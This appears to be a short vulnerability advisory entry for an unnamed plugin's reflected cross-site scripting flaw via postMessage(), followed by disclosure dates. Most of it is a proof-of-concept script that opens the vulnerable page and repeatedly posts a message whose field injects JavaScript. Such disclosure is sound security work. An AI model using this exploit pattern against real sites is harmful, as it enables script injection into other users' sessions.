The plugin was affected by a Reflected Cross-Site Scripting issue via the postMessage() event.
Use the following code on another website <script> var popup = window.open('https://VULNERABLE.PAGE/'); var msg = {}; msg.method = "alert(document.domain)"; function post(){popup.postMessage(msg,'*')} setInterval(post,1000); </script>
2021-01-20 (about 2 years ago)
2021-01-20 (about 2 years ago)
2021-01-21 (about 2 years ago)